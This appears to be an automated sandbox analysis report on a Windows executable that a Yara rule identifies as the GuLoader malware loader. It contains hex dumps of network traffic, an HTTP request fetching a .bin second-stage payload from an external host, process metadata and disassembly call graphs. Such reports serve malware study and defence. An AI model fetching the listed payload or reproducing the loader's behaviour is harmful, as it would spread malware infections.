                                                2024-10-20 15:58:26 UTC8000INData Raw: 20 14 23 5d ca fa f2 91 a2 ce 49 99 1b 5b 8f 5f 02 de 55 3f 8c 21 c7 cb fd d2 6f c3 54 40 4a 84 5c 1c 26 d0 89 25 1f 93 1c 7a 29 7b 41 44 ac 89 09 98 26 26 03 81 70 2e dd 85 e1 bc f6 7d 5b b4 60 c1 b4 6b 4f 1c 92 7c a5 cc 9c 4f 6b c2 56 88 26 83 48 9a de 9f 3f 09 42 f8 81 1b 8b c2 5c 79 13 cb c4 48 8a 2b 3d a2 43 aa 72 90 97 7d e0 80 40 df d7 03 d6 57 eb d8 30 39 99 dd 2e bb c1 93 cb f4 de af e6 b5 7a a5 32 95 e0 d3 df 66 9c 92 35 8d 31 12 7e 59 3b 0b e5 ee 56 b5 7d 95 d3 0d 4e 6c a4 73 d5 48 25 d8 4e 69 08 b5 a3 1b b3 c7 7e 8d 5b 67 29 2b 96 e3 d7 a5 9c 61 e0 2b c7 9e 59 2b e2 bc cf 46 b8 bf 82 2a 5d c6 36 63 87 c6 44 cb 52 cf 7e 5a 60 39 35 66 92 4c 43 19 ba 4c dc 6a c8 d6 a6 5d a3 97 3c 9b 0e 5e 7b 2b 65 5c 25 95 63 40 b6 90 f6 88 9a 6a 44 95 b8 c0 fc
                                                Data Ascii: #]I[_U?!oT@J\&%z){AD&&p.}[`kO|OkV&H?B\yH+=Cr}@W09.z2f51~Y;V}NlsH%Ni~[g)+a+Y+F*]6cDR~Z`95fLCLj]<^{+e\%c@jD
                                                2024-10-20 15:58:26 UTC8000INData Raw: 2f ee b9 66 d5 64 2f ca 63 7d 0b 5d e8 98 1f 27 32 04 64 96 96 54 74 d7 e8 20 7d f4 39 2f 7e 27 1f 03 33 0a d7 19 6e ad ac 04 eb 9a 04 aa 6e 3b 3c e1 06 91 af 74 a7 74 e9 fa 34 12 89 8f b4 80 fa 6c 70 5b 4b db ff c8 57 c3 b1 0e c3 cd cf 07 cb d6 cb 50 cf 91 ea b1 82 0a d4 a8 40 5a 7e 43 bc 24 1d a1 61 05 b8 72 4b 64 aa 0e 55 0c e0 c4 7c d9 fe 69 b8 19 67 64 3d 29 39 e3 3e a1 0a d0 02 97 cb db 60 b1 59 4c d5 0e 4b e6 14 cf 05 88 fa 50 8f 96 b8 f4 f8 ad ed 75 42 6a fe 3d 1d 0c dd b1 54 f3 d3 0d 96 51 02 ef 2c b6 80 02 9a 96 23 df 04 05 2b 60 77 0d ac a5 b8 a9 da 71 bc f7 4f a2 b0 6d 8f 2a 51 ee cb c7 71 bd b8 95 ae 2e d0 cc c3 aa 0b a0 fd 80 db d4 fd a9 23 e6 10 db c5 82 89 29 03 00 ba 3a bf af 03 40 10 09 d7 9e b7 a0 c7 2a e6 c1 6c d0 ab 17 ce 69 0d 0d 76
                                                Data Ascii: /fd/c}]'2dTt }9/~'3nn;<tt4lp[KWP@Z~C$arKdU|igd=)9>`YLKPuBj=TQ,#+`wqOm*Qq.#):@*liv
                                                2024-10-20 15:58:26 UTC8000INData Raw: 47 8a 28 16 da 10 e2 3f c9 ef 6e 1c 85 0c 5b 11 27 72 93 a2 2c 61 24 c5 f0 ea 6d 3d 3b 97 9d 11 99 94 06 39 44 4d b7 6d 87 d8 73 b0 0c f6 7e 1f 4b 8d f6 0a 2a ec ee b0 11 fe 76 ba 83 9a b9 88 d0 a5 1e b8 91 76 a7 51 83 82 b2 d9 59 16 f2 2e 83 b1 d4 10 98 6d ad ee 7a 7c 4e 3e 4b 8c 1a 11 c8 71 ae 44 84 23 94 ab 8f 2f 72 08 28 3b 29 be 9b 81 95 5f 8d e6 00 69 6b fa 9d f9 43 22 cf 6a 10 fb 3a b6 aa dc 83 ff fe a5 64 5c 82 24 f4 01 14 2d a3 f6 82 10 46 0a 0e ea 41 ac 6c 6b 6f 06 d8 50 3c 2d aa ff b6 c6 0e ed 9d 2d 41 36 a6 aa f5 6e 3e 66 0f 16 8b df fd 8c d3 47 1d 49 a1 ce 08 3e 82 39 c4 b7 36 74 a7 ae 75 7c 77 06 79 a0 09 6a 5b ee 8e 56 64 34 2e c9 19 d8 17 fc 4f 39 30 5b ea 7c 72 1b ad 37 93 84 73 09 82 d5 f9 ad 3d 6c 66 7d f6 73 af 47 f7 a7 b7 32 38 2c 7b
                                                Data Ascii: G(?n['r,a$m=;9DMms~K*vvQY.mz|N>KqD#/r(;)_ikC"j:d\$-FAlkoP<--A6n>fGI>96tu|wyj[Vd4.O90[|r7s=lf}sG28,{
                                                2024-10-20 15:58:26 UTC8000INData Raw: ce a5 91 1c 26 fa 3f 5c ad 85 ca 4b 33 f3 5e e5 6e 91 87 da c5 0f 58 2f 14 8a b1 35 44 d9 57 9d a9 98 d4 51 9f 55 19 c0 a4 d0 9b 7a 34 62 43 e2 71 46 85 03 31 cc 38 97 4a 33 62 35 4e 3f ae 47 19 8c be f5 76 4b b9 f6 61 04 2c 32 d7 d3 3e f5 25 2a 33 6e ad f9 7c 6b 4c 86 8f 64 83 24 ad c3 c3 d2 bc 3d 3b 92 9d cf 2c 4c a4 00 b1 d0 6f 89 76 21 d0 b3 8f b1 17 58 45 9f 78 13 52 38 8e 15 bc 4d 39 23 59 6e e5 cd 4a e9 02 1d 4c c7 e6 0c 1b 8e 69 ec b8 b5 2f ea 58 16 78 33 a7 9b 35 a5 4a 4c f7 4f 2b 76 ba 27 7a 6a 2e 34 74 57 d4 30 73 4d 74 cb 72 9b 5c 33 95 3d 22 e2 bc c7 38 d2 a3 df 1c 1e d7 39 5b 5a ff 20 83 bb 76 15 90 07 9f 5c 26 1e ba fb 08 b1 8f 6e 55 c0 a9 a3 87 49 01 2e c2 df 12 8c 56 af fa 06 16 3e b2 ae 51 11 1f f1 fb 1a d5 84 d4 89 61 34 38 53 67 af 4b
                                                Data Ascii: &?\K3^nX/5DWQUz4bCqF18J3b5N?GvKa,2>%*3n|kLd$=;,Lov!XExR8M9#YnJLi/Xx35JLO+v'zj.4tW0sMtr\3="89[Z v\&nUI.V>Qa48SgK
                                                2024-10-20 15:58:26 UTC8000INData Raw: 6c 6c a7 e9 9f 49 1f fe ab ee b1 78 0c 44 f4 17 33 a9 4e 1d 0e 2e 88 fe 7c 7c 15 77 18 6e ed 37 65 6a 3d ab f2 fc da 73 fc 4a 4e 3e f2 da fa e2 b4 6f fb c6 9c 65 8a df 4a a3 a3 4b 32 3d a1 9e 7e 2c 8e 59 94 00 e9 af 9a 61 dd aa 68 3f 3a d8 12 b6 80 f0 23 f2 d5 67 23 f9 a3 20 f2 a7 e8 23 5a 80 c5 19 32 ae aa 23 a4 62 79 9d 2d d8 74 af 0a 9d ed 83 f7 ef cd 7d 22 0c ab 13 e2 e5 54 fa 20 57 96 d8 9f a8 8f 0c da 46 58 20 a9 6c 41 d5 80 27 32 cb 2a dd eb 91 ac 07 07 e9 c9 a4 ea 8b 3d 37 94 7a d7 d6 eb 8a b5 c2 b8 ff 9c 12 80 8c 9f d1 93 fd ba 66 60 e3 13 68 c6 a6 e7 2d a9 62 02 05 8d 78 58 70 30 4f 21 2d a9 f4 76 0d a2 fd 61 9c 61 c7 6e c3 b4 54 ae fe 8e 4d 1d 95 1b b4 75 45 fa b1 dc 35 91 c0 ff 94 c9 41 5f bb 1b e0 4e 8c c0 8f 5e 42 40 13 59 fc 69 5f de 69 02
                                                Data Ascii: llIxD3N.||wn7ej=sJN>oeJK2=~,Yah?:#g# #Z2#by-t}"T WFX lA'2*=7zf`h-bxXp0O!-vaanTMuE5A_N^B@Yi_i


                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                1192.168.2.449982193.107.36.304438124C:\Users\user\Desktop\3507071243740008011.exe
                                                TimestampBytes transferredDirectionData
                                                2024-10-20 15:58:38 UTC174OUTGET /jFhxxDhhDcCKVgiwlWM221.bin HTTP/1.1
                                                User-Agent: 5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0
                                                Host: alfacen.com
                                                Cache-Control: no-cache
                                                2024-10-20 15:58:38 UTC344INHTTP/1.1 200 OK
                                                Date: Sun, 20 Oct 2024 15:58:38 GMT
                                                Server: Apache
                                                Upgrade: h2,h2c
                                                Connection: Upgrade, close
                                                Last-Modified: Fri, 18 Oct 2024 13:09:53 GMT
                                                Accept-Ranges: bytes
                                                Content-Length: 289344
                                                Cache-Control: max-age=2592000
                                                Expires: Tue, 19 Nov 2024 15:58:38 GMT
                                                Vary: Accept-Encoding
                                                Content-Type: application/octet-stream
                                                2024-10-20 15:58:38 UTC7848INData Raw: cd c4 32 61 fb d9 39 26 04 dc 17 79 65 ca 29 f9 97 dd 2a 9a b8 89 1e 30 82 1c ed 54 4b 5b 59 50 43 1b 3e 16 de 3c 83 74 45 d7 49 8f ec 93 7d 4b f9 34 07 20 ec 59 fd ec d2 6a 68 e5 55 1a a8 9e f3 26 b7 d8 f2 e5 47 a6 b0 ef a9 72 9e 2c 15 36 ad b1 22 69 1c 60 5f 47 67 ca c0 68 2b b1 91 2c 64 63 6f 3e 1c 5b 83 a9 4e d8 89 f9 0a 8e c1 1c 94 ca cd 5c 2d 40 ea df cb 0a 1a 11 ae 05 80 bf a4 7b 92 db e1 77 7b 7d 33 4c 89 18 00 6f be 63 16 40 e7 3e 92 aa 31 1e 97 9a 40 64 dd f7 4b d2 7a 7e 16 c7 7e 1b fd d5 bf 2d f0 b6 8f 7c d7 e3 e5 9f 72 f9 1a 2d 97 87 ba cd 8c a0 37 b6 8f a7 c5 53 de f8 c1 c9 1f 16 ed 07 03 be df 8e f4 01 b8 d9 0f 67 da c6 aa 59 02 97 90 eb 6d be 80 65 00 b1 80 20 bd b9 14 16 7d ac da da d9 10 7f b7 79 37 a8 67 27 32 bb 0d d0 8b 05 ae 35 91 e9
                                                Data Ascii: 2a9&ye)*0TK[YPC><tEI}K4 YjhU&Gr,6"i`_Ggh+,dco>[N\-@{w{}3Loc@>1@dKz~~-|r-7SgYme }y7g'25
                                                2024-10-20 15:58:38 UTC8000INData Raw: a6 8f d8 ec 96 d4 b8 54 a0 f4 74 2d 1c cc d0 54 9d 3e 18 25 71 93 e2 95 6d 51 55 39 9f d1 58 41 03 08 63 34 52 e9 00 d5 87 e6 6b 60 ca 61 3d 86 1d f1 99 26 fb 55 f8 79 b7 67 fd 7d a5 5f 56 bf 1b 05 6e 8d 09 91 0b d1 b0 7d 87 f5 f5 a5 f5 d3 fc e3 58 7a fc 5e ce 13 22 9f 7e 3e 4a f8 4d cc 35 bc 5d 07 54 a4 02 18 30 08 1b e2 86 7b fd fe c1 14 91 06 ef 95 63 6a b0 24 b7 c2 d2 13 d4 f1 bb 7a 79 1d 31 a7 ad b9 13 b4 aa 9f 44 9d 5e 0c 9c 39 a3 47 c6 03 ef cf 21 7a 6a 82 60 73 e1 59 89 da 89 0d b2 a8 b1 72 77 d7 64 7c 08 01 73 29 c0 f2 09 d1 11 d9 e5 10 7d 38 ec e5 44 3c 82 7f fc a4 de de 04 ea bd 38 6a e5 f2 f8 bd 24 10 2a 1c 94 b6 58 84 3f f9 60 70 ee 62 42 c0 11 c6 ae 74 30 11 3e 44 ce a0 cf f9 35 9d 05 ac b0 ef ca c3 65 b8 bc 5f 7c 03 45 75 20 bc a6 eb 93 71
                                                Data Ascii: Tt-T>%qmQU9XAc4Rk`a=&Uyg}_Vn}Xz^"~>JM5]T0{cj$zy1D^9G!zj`sYrwd|s)}8D<8j$*X?`pbBt0>D5e_|Eu q
                                                2024-10-20 15:58:38 UTC8000INData Raw: 8a 0f de 8d 04 28 e2 44 15 95 50 b8 cd 9e 33 df 25 e4 23 bf c0 8a 9c 7d 51 0d bd 89 60 e0 fa 87 28 48 a7 c5 a2 5f ea 67 11 c5 df 21 b3 fa 14 01 f2 f7 47 7c 78 af ef b3 ff 31 38 16 45 82 db 1f d6 81 3c 04 dd 2e e4 7c df 5e 07 17 5c 0b bc 6e 55 53 fe df b8 f4 48 3d 49 ca 86 d5 6a 32 86 0f 68 85 00 48 88 6d 09 48 d3 19 e2 93 c1 d4 89 99 25 2e ee 8b 61 f0 2a a4 06 63 7d 13 c3 1a 71 cb 6f 2f 1b 84 4f 4f 5e 8f 78 be e5 d6 af 77 6b d5 41 e6 40 70 73 3a 93 6d 60 ab a1 a1 94 f2 b0 ad a2 42 6b ee e7 c8 18 ea 9f a6 f4 76 84 58 ca cd 48 03 d1 cb b8 83 91 7b 78 d4 2e 61 f6 d5 8e 08 a8 75 78 8e ad 46 7c a1 ba 4e 09 98 d6 44 33 d4 9d 34 56 89 6c f9 6a 03 03 d9 3d 7c a8 72 3d ab 13 64 9a a0 b2 6f 66 1f 52 ab 1b 13 f1 f3 19 2b 72 3c 08 89 c5 ce 8f 3b f7 74 96 88 cc 1e 21
                                                Data Ascii: (DP3%#}Q`(H_g!G|x18E<.|^\nUSH=Ij2hHmH%.a*c}qo/OO^xwkA@ps:m`BkvXH{x.auxF|ND34Vlj=|r=dofR+r<;t!
                                                2024-10-20 15:58:38 UTC8000INData Raw: ab c3 13 e3 29 6e cc ad 14 aa b0 1d 0e b1 7a 68 d1 d9 77 35 0c 2c 44 37 ff 7c e8 95 ab 0f 66 79 80 e8 e1 2e f5 dd 85 6e 5d f6 a8 b7 a4 81 a3 0c 8e 20 3f eb 42 59 58 85 f8 4d 55 9a 6c b6 33 24 05 42 9d 32 d0 22 57 38 70 3b 0f 3b 36 54 9a 6f 14 e8 74 c1 ca a9 e9 80 2c 91 2a ef 23 bd d8 8f 40 f5 46 de b1 cc 37 43 df 75 ec 4e c4 24 0c 2d 94 07 80 44 21 bc f3 48 86 52 d8 fa cf d0 ad 2d 5c 2e 6d 32 b9 98 6b 63 35 40 1a 2b c5 5a d1 91 0c e6 09 ad da f3 b2 0c d8 ab 9f 51 79 57 a7 6d c3 16 12 e8 dc b6 11 3c 3c 79 a4 45 e6 67 27 b5 31 91 da 60 6a 95 31 40 c0 37 65 58 a6 53 92 c3 8b 64 a3 78 4d f2 d8 f0 1e ce 28 c1 5b 9f b8 05 de 30 f6 18 5c 7e e8 90 ae f1 27 85 74 be 7f d2 e9 db 09 0a d6 fa 42 74 11 aa 9a d3 90 04 38 10 5c 12 f2 3a 4a 24 c2 48 4e 81 ed e1 bc 35 9e
                                                Data Ascii: )nzhw5,D7|fy.n] ?BYXMUl3$B2"W8p;;6Tot,*#@F7CuN$-D!HR-\.m2kc5@+ZQyWm<<yEg'1`j1@7eXSdxM([0\~'tBt8\:J$HN5
                                                2024-10-20 15:58:38 UTC8000INData Raw: 47 de ae 68 9d 98 9d e2 7c 07 d0 73 7b 88 9c 14 22 09 bb 87 6f 93 1e 6a 47 26 d4 9c f3 9f 58 5e fc d9 8a df 0e ef 64 60 ad b8 3e bf 08 2b d0 e3 85 07 66 52 4f 82 9f 3a 71 32 29 88 a4 89 12 03 c1 fd 66 25 3c 03 e4 9f 89 9f b4 24 c9 45 2d 21 10 bd 43 20 93 a6 50 01 f8 60 13 0a 65 7a 2d 85 64 86 6c 54 58 e5 54 26 81 03 1d f7 94 94 01 92 85 a6 b8 92 83 05 c0 60 8f 4f 87 67 db 0c d5 37 37 3c 0d 96 c4 87 fe e4 94 91 db 2c dc 78 b7 e7 a3 aa 2a 9f 31 51 9d 41 7f 79 fa 75 10 26 6d dd 6c c4 0a 96 f0 d7 57 89 32 51 fa c6 6a 97 8d 35 66 0d d9 a4 07 a1 fa 24 3d 5f 86 8c bf 2b 17 b3 96 4b 40 1f 2b 01 a3 52 ec bd bb 47 a6 94 3a 8d 27 ee 81 e3 ec 08 a8 19 9d 4f 42 35 bf d5 34 5b 6e 82 c4 7e 18 cc ba b1 b6 99 53 f7 e3 8b 81 01 b5 3b 75 06 85 94 70 f2 a0 d8 7b e7 f8 22 19
                                                Data Ascii: Gh|s{"ojG&X^d`>+fRO:q2)f%<$E-!C P`ez-dlTXT&`Og77<,x*1QAyu&mlW2Qj5f$=_+K@+RG:'OB54[n~S;up{"
                                                2024-10-20 15:58:38 UTC8000INData Raw: 20 14 23 5d ca fa f2 91 a2 ce 49 99 1b 5b 8f 5f 02 de 55 3f 8c 21 c7 cb fd d2 6f c3 54 40 4a 84 5c 1c 26 d0 89 25 1f 93 1c 7a 29 7b 41 44 ac 89 09 98 26 26 03 81 70 2e dd 85 e1 bc f6 7d 5b b4 60 c1 b4 6b 4f 1c 92 7c a5 cc 9c 4f 6b c2 56 88 26 83 48 9a de 9f 3f 09 42 f8 81 1b 8b c2 5c 79 13 cb c4 48 8a 2b 3d a2 43 aa 72 90 97 7d e0 80 40 df d7 03 d6 57 eb d8 30 39 99 dd 2e bb c1 93 cb f4 de af e6 b5 7a a5 32 95 e0 d3 df 66 9c 92 35 8d 31 12 7e 59 3b 0b e5 ee 56 b5 7d 95 d3 0d 4e 6c a4 73 d5 48 25 d8 4e 69 08 b5 a3 1b b3 c7 7e 8d 5b 67 29 2b 96 e3 d7 a5 9c 61 e0 2b c7 9e 59 2b e2 bc cf 46 b8 bf 82 2a 5d c6 36 63 87 c6 44 cb 52 cf 7e 5a 60 39 35 66 92 4c 43 19 ba 4c dc 6a c8 d6 a6 5d a3 97 3c 9b 0e 5e 7b 2b 65 5c 25 95 63 40 b6 90 f6 88 9a 6a 44 95 b8 c0 fc
                                                Data Ascii: #]I[_U?!oT@J\&%z){AD&&p.}[`kO|OkV&H?B\yH+=Cr}@W09.z2f51~Y;V}NlsH%Ni~[g)+a+Y+F*]6cDR~Z`95fLCLj]<^{+e\%c@jD
                                                2024-10-20 15:58:38 UTC8000INData Raw: 2f ee b9 66 d5 64 2f ca 63 7d 0b 5d e8 98 1f 27 32 04 64 96 96 54 74 d7 e8 20 7d f4 39 2f 7e 27 1f 03 33 0a d7 19 6e ad ac 04 eb 9a 04 aa 6e 3b 3c e1 06 91 af 74 a7 74 e9 fa 34 12 89 8f b4 80 fa 6c 70 5b 4b db ff c8 57 c3 b1 0e c3 cd cf 07 cb d6 cb 50 cf 91 ea b1 82 0a d4 a8 40 5a 7e 43 bc 24 1d a1 61 05 b8 72 4b 64 aa 0e 55 0c e0 c4 7c d9 fe 69 b8 19 67 64 3d 29 39 e3 3e a1 0a d0 02 97 cb db 60 b1 59 4c d5 0e 4b e6 14 cf 05 88 fa 50 8f 96 b8 f4 f8 ad ed 75 42 6a fe 3d 1d 0c dd b1 54 f3 d3 0d 96 51 02 ef 2c b6 80 02 9a 96 23 df 04 05 2b 60 77 0d ac a5 b8 a9 da 71 bc f7 4f a2 b0 6d 8f 2a 51 ee cb c7 71 bd b8 95 ae 2e d0 cc c3 aa 0b a0 fd 80 db d4 fd a9 23 e6 10 db c5 82 89 29 03 00 ba 3a bf af 03 40 10 09 d7 9e b7 a0 c7 2a e6 c1 6c d0 ab 17 ce 69 0d 0d 76
                                                Data Ascii: /fd/c}]'2dTt }9/~'3nn;<tt4lp[KWP@Z~C$arKdU|igd=)9>`YLKPuBj=TQ,#+`wqOm*Qq.#):@*liv
                                                2024-10-20 15:58:38 UTC8000INData Raw: 47 8a 28 16 da 10 e2 3f c9 ef 6e 1c 85 0c 5b 11 27 72 93 a2 2c 61 24 c5 f0 ea 6d 3d 3b 97 9d 11 99 94 06 39 44 4d b7 6d 87 d8 73 b0 0c f6 7e 1f 4b 8d f6 0a 2a ec ee b0 11 fe 76 ba 83 9a b9 88 d0 a5 1e b8 91 76 a7 51 83 82 b2 d9 59 16 f2 2e 83 b1 d4 10 98 6d ad ee 7a 7c 4e 3e 4b 8c 1a 11 c8 71 ae 44 84 23 94 ab 8f 2f 72 08 28 3b 29 be 9b 81 95 5f 8d e6 00 69 6b fa 9d f9 43 22 cf 6a 10 fb 3a b6 aa dc 83 ff fe a5 64 5c 82 24 f4 01 14 2d a3 f6 82 10 46 0a 0e ea 41 ac 6c 6b 6f 06 d8 50 3c 2d aa ff b6 c6 0e ed 9d 2d 41 36 a6 aa f5 6e 3e 66 0f 16 8b df fd 8c d3 47 1d 49 a1 ce 08 3e 82 39 c4 b7 36 74 a7 ae 75 7c 77 06 79 a0 09 6a 5b ee 8e 56 64 34 2e c9 19 d8 17 fc 4f 39 30 5b ea 7c 72 1b ad 37 93 84 73 09 82 d5 f9 ad 3d 6c 66 7d f6 73 af 47 f7 a7 b7 32 38 2c 7b
                                                Data Ascii: G(?n['r,a$m=;9DMms~K*vvQY.mz|N>KqD#/r(;)_ikC"j:d\$-FAlkoP<--A6n>fGI>96tu|wyj[Vd4.O90[|r7s=lf}sG28,{
                                                2024-10-20 15:58:38 UTC8000INData Raw: ce a5 91 1c 26 fa 3f 5c ad 85 ca 4b 33 f3 5e e5 6e 91 87 da c5 0f 58 2f 14 8a b1 35 44 d9 57 9d a9 98 d4 51 9f 55 19 c0 a4 d0 9b 7a 34 62 43 e2 71 46 85 03 31 cc 38 97 4a 33 62 35 4e 3f ae 47 19 8c be f5 76 4b b9 f6 61 04 2c 32 d7 d3 3e f5 25 2a 33 6e ad f9 7c 6b 4c 86 8f 64 83 24 ad c3 c3 d2 bc 3d 3b 92 9d cf 2c 4c a4 00 b1 d0 6f 89 76 21 d0 b3 8f b1 17 58 45 9f 78 13 52 38 8e 15 bc 4d 39 23 59 6e e5 cd 4a e9 02 1d 4c c7 e6 0c 1b 8e 69 ec b8 b5 2f ea 58 16 78 33 a7 9b 35 a5 4a 4c f7 4f 2b 76 ba 27 7a 6a 2e 34 74 57 d4 30 73 4d 74 cb 72 9b 5c 33 95 3d 22 e2 bc c7 38 d2 a3 df 1c 1e d7 39 5b 5a ff 20 83 bb 76 15 90 07 9f 5c 26 1e ba fb 08 b1 8f 6e 55 c0 a9 a3 87 49 01 2e c2 df 12 8c 56 af fa 06 16 3e b2 ae 51 11 1f f1 fb 1a d5 84 d4 89 61 34 38 53 67 af 4b
                                                Data Ascii: &?\K3^nX/5DWQUz4bCqF18J3b5N?GvKa,2>%*3n|kLd$=;,Lov!XExR8M9#YnJLi/Xx35JLO+v'zj.4tW0sMtr\3="89[Z v\&nUI.V>Qa48SgK
                                                2024-10-20 15:58:38 UTC8000INData Raw: 6c 6c a7 e9 9f 49 1f fe ab ee b1 78 0c 44 f4 17 33 a9 4e 1d 0e 2e 88 fe 7c 7c 15 77 18 6e ed 37 65 6a 3d ab f2 fc da 73 fc 4a 4e 3e f2 da fa e2 b4 6f fb c6 9c 65 8a df 4a a3 a3 4b 32 3d a1 9e 7e 2c 8e 59 94 00 e9 af 9a 61 dd aa 68 3f 3a d8 12 b6 80 f0 23 f2 d5 67 23 f9 a3 20 f2 a7 e8 23 5a 80 c5 19 32 ae aa 23 a4 62 79 9d 2d d8 74 af 0a 9d ed 83 f7 ef cd 7d 22 0c ab 13 e2 e5 54 fa 20 57 96 d8 9f a8 8f 0c da 46 58 20 a9 6c 41 d5 80 27 32 cb 2a dd eb 91 ac 07 07 e9 c9 a4 ea 8b 3d 37 94 7a d7 d6 eb 8a b5 c2 b8 ff 9c 12 80 8c 9f d1 93 fd ba 66 60 e3 13 68 c6 a6 e7 2d a9 62 02 05 8d 78 58 70 30 4f 21 2d a9 f4 76 0d a2 fd 61 9c 61 c7 6e c3 b4 54 ae fe 8e 4d 1d 95 1b b4 75 45 fa b1 dc 35 91 c0 ff 94 c9 41 5f bb 1b e0 4e 8c c0 8f 5e 42 40 13 59 fc 69 5f de 69 02
                                                Data Ascii: llIxD3N.||wn7ej=sJN>oeJK2=~,Yah?:#g# #Z2#by-t}"T WFX lA'2*=7zf`h-bxXp0O!-vaanTMuE5A_N^B@Yi_i


                                                Statistics

                                                CPU Usage

                                                Click to jump to process

                                                Memory Usage

                                                Click to jump to process

                                                Behavior

                                                Click to jump to process

                                                System Behavior

                                                General

                                                Target ID:0
                                                Start time:11:56:41
                                                Start date:20/10/2024
                                                Path:C:\Users\user\Desktop\3507071243740008011.exe
                                                Wow64 process (32bit):true
                                                Commandline:"C:\Users\user\Desktop\3507071243740008011.exe"
                                                Imagebase:0x400000
                                                File size:986'863 bytes
                                                MD5 hash:300FFB3FD65EB4A84A14802828F91E38
                                                Has elevated privileges:true
                                                Has administrator privileges:true
                                                Programmed in:C, C++ or other language
                                                Yara matches:
                                                • Rule: JoeSecurity_GuLoader_2, Description: Yara detected GuLoader, Source: 00000000.00000002.2641992068.0000000005438000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                Reputation:low
                                                Has exited:true

                                                General

                                                Target ID:5
                                                Start time:11:58:14
                                                Start date:20/10/2024
                                                Path:C:\Users\user\Desktop\3507071243740008011.exe
                                                Wow64 process (32bit):true
                                                Commandline:"C:\Users\user\Desktop\3507071243740008011.exe"
                                                Imagebase:0x400000
                                                File size:986'863 bytes
                                                MD5 hash:300FFB3FD65EB4A84A14802828F91E38
                                                Has elevated privileges:true
                                                Has administrator privileges:true
                                                Programmed in:C, C++ or other language
                                                Reputation:low
                                                Has exited:true

                                                Disassembly

                                                Reset < >

                                                  Execution Graph

                                                  Execution Coverage:22.6%
                                                  Dynamic/Decrypted Code Coverage:0%
                                                  Signature Coverage:19.5%
                                                  Total number of Nodes:1549
                                                  Total number of Limit Nodes:45
                                                  execution_graph 4922 10001000 4925 1000101b 4922->4925 4926 10001516 GlobalFree 4925->4926 4927 10001020 4926->4927 4928 10001024 4927->4928 4929 10001027 GlobalAlloc 4927->4929 4930 1000153d 3 API calls 4928->4930 4929->4928 4931 10001019 4930->4931 3894 401941 3895 401943 3894->3895 3896 402c37 17 API calls 3895->3896 3897 401948 3896->3897 3900 405990 3897->3900 3939 405c5b 3900->3939 3903 4059b8 DeleteFileW 3905 401951 3903->3905 3904 4059cf 3906 405aef 3904->3906 3953 406282 lstrcpynW 3904->3953 3906->3905 3971 4065c5 FindFirstFileW 3906->3971 3908 4059f5 3909 405a08 3908->3909 3910 4059fb lstrcatW 3908->3910 3954 405b9f lstrlenW 3909->3954 3911 405a0e 3910->3911 3915 405a1e lstrcatW 3911->3915 3917 405a29 lstrlenW FindFirstFileW 3911->3917 3915->3917 3916 405b18 3974 405b53 lstrlenW CharPrevW 3916->3974 3917->3906 3924 405a4b 3917->3924 3920 405ad2 FindNextFileW 3920->3924 3925 405ae8 FindClose 3920->3925 3921 405948 5 API calls 3923 405b2a 3921->3923 3926 405b44 3923->3926 3927 405b2e 3923->3927 3924->3920 3933 405a93 3924->3933 3958 406282 lstrcpynW 3924->3958 3925->3906 3929 4052e6 24 API calls 3926->3929 3927->3905 3930 4052e6 24 API calls 3927->3930 3929->3905 3932 405b3b 3930->3932 3931 405990 60 API calls 3931->3933 3935 406048 36 API calls 3932->3935 3933->3920 3933->3931 3934 4052e6 24 API calls 3933->3934 3936 4052e6 24 API calls 3933->3936 3959 405948 3933->3959 3967 406048 MoveFileExW 3933->3967 3934->3920 3937 405b42 3935->3937 3936->3933 3937->3905 3977 406282 lstrcpynW 3939->3977 3941 405c6c 3978 405bfe CharNextW CharNextW 3941->3978 3944 4059b0 3944->3903 3944->3904 3945 406516 5 API calls 3951 405c82 3945->3951 3946 405cb3 lstrlenW 3947 405cbe 3946->3947 3946->3951 3949 405b53 3 API calls 3947->3949 3948 4065c5 2 API calls 3948->3951 3950 405cc3 GetFileAttributesW 3949->3950 3950->3944 3951->3944 3951->3946 3951->3948 3952 405b9f 2 API calls 3951->3952 3952->3946 3953->3908 3955 405bad 3954->3955 3956 405bb3 CharPrevW 3955->3956 3957 405bbf 3955->3957 3956->3955 3956->3957 3957->3911 3958->3924 3984 405d4f GetFileAttributesW 3959->3984 3962 405975 3962->3933 3963 405963 RemoveDirectoryW 3965 405971 3963->3965 3964 40596b DeleteFileW 3964->3965 3965->3962 3966 405981 SetFileAttributesW 3965->3966 3966->3962 3968 406069 3967->3968 3969 40605c 3967->3969 3968->3933 3987 405ece 3969->3987 3972 405b14 3971->3972 3973 4065db FindClose 3971->3973 3972->3905 3972->3916 3973->3972 3975 405b1e 3974->3975 3976 405b6f lstrcatW 3974->3976 3975->3921 3976->3975 3977->3941 3979 405c1b 3978->3979 3983 405c2d 3978->3983 3981 405c28 CharNextW 3979->3981 3979->3983 3980 405c51 3980->3944 3980->3945 3981->3980 3982 405b80 CharNextW 3982->3983 3983->3980 3983->3982 3985 405d61 SetFileAttributesW 3984->3985 3986 405954 3984->3986 3985->3986 3986->3962 3986->3963 3986->3964 3988 405f24 GetShortPathNameW 3987->3988 3989 405efe 3987->3989 3990 406043 3988->3990 3991 405f39 3988->3991 4014 405d74 GetFileAttributesW CreateFileW 3989->4014 3990->3968 3991->3990 3993 405f41 wsprintfA 3991->3993 3995 4062a4 17 API calls 3993->3995 3994 405f08 CloseHandle GetShortPathNameW 3994->3990 3996 405f1c 3994->3996 3997 405f69 3995->3997 3996->3988 3996->3990 4015 405d74 GetFileAttributesW CreateFileW 3997->4015 3999 405f76 3999->3990 4000 405f85 GetFileSize GlobalAlloc 3999->4000 4001 405fa7 4000->4001 4002 40603c CloseHandle 4000->4002 4016 405df7 ReadFile 4001->4016 4002->3990 4007 405fc6 lstrcpyA 4010 405fe8 4007->4010 4008 405fda 4009 405cd9 4 API calls 4008->4009 4009->4010 4011 40601f SetFilePointer 4010->4011 4023 405e26 WriteFile 4011->4023 4014->3994 4015->3999 4017 405e15 4016->4017 4017->4002 4018 405cd9 lstrlenA 4017->4018 4019 405d1a lstrlenA 4018->4019 4020 405d22 4019->4020 4021 405cf3 lstrcmpiA 4019->4021 4020->4007 4020->4008 4021->4020 4022 405d11 CharNextA 4021->4022 4022->4019 4024 405e44 GlobalFree 4023->4024 4024->4002 4025 4015c1 4026 402c37 17 API calls 4025->4026 4027 4015c8 4026->4027 4028 405bfe 4 API calls 4027->4028 4040 4015d1 4028->4040 4029 401631 4031 401663 4029->4031 4032 401636 4029->4032 4030 405b80 CharNextW 4030->4040 4034 401423 24 API calls 4031->4034 